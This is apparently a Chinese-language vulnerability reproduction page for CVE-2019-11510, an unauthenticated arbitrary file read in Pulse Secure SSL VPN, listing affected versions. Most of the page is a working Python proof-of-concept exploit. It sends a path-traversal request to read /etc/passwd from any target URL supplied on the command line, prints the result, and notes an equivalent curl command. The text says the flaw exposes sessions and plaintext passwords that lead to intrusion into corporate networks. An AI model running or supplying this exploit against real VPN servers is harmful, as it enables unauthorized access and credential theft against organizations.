(CVE-2019-11510)Pulse Secure SSL VPN 任意文件读取

一、漏洞简介

Pulse Secure Pulse Connect Secure(又名 PCS,前称 Juniper Junos Pulse)是美国 Pulse Secure 公司的一套 SSL VPN 解决方案。爆发的 CVE-2019-11510 该漏洞是由于所引入的一项通过浏览器访问其他端口的新功能缺乏安全限制所导致的,任意攻击者都可在未经身份验证的情况下利用该漏洞,读取系统敏感文件,获取 session、明文密码等敏感信息,从而非法入侵并操控 VPN,从而进一步威胁企业内网服务。

二、漏洞影响

Pulse Secure PCS 9.0RX

Pulse Secure PCS 8.3RX

Pulse Secure PCS 8.2RX

Pulse Secure PCS 8.1R15.1

三、复现过程

poc

[email protected]

1.png

# -*- coding:utf-8 -*-
# !/usr/bin/env python

import sys
import urlparse
import requests
import warnings
import traceback

reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")

def CVE_2019_11510(base_url):
    try:
        payloads, keywords = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/", "root:x"
        r = requests.get(base_url + payloads, verify=False)
        r.close()
        if keywords in r.text:
            print "[✓] Found CVE-2019-11510 Vuln address(curl --path-as-is -s -k <target>):\n{}\n{}".format(
                base_url + payloads, r.content)
        else:
            print "[x] Not Found Vuln!"
    except requests.exceptions.ConnectionError:
        pass
    except requests.ReadTimeout:
        pass
    except:
        traceback.print_exc()

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print '[+] Tip: python [email protected] <url>'
        sys.exit(0)
    url = sys.argv[1]
    CVE_2019_11510(urlparse.urlparse(url).scheme + "://" + urlparse.urlparse(url).hostname)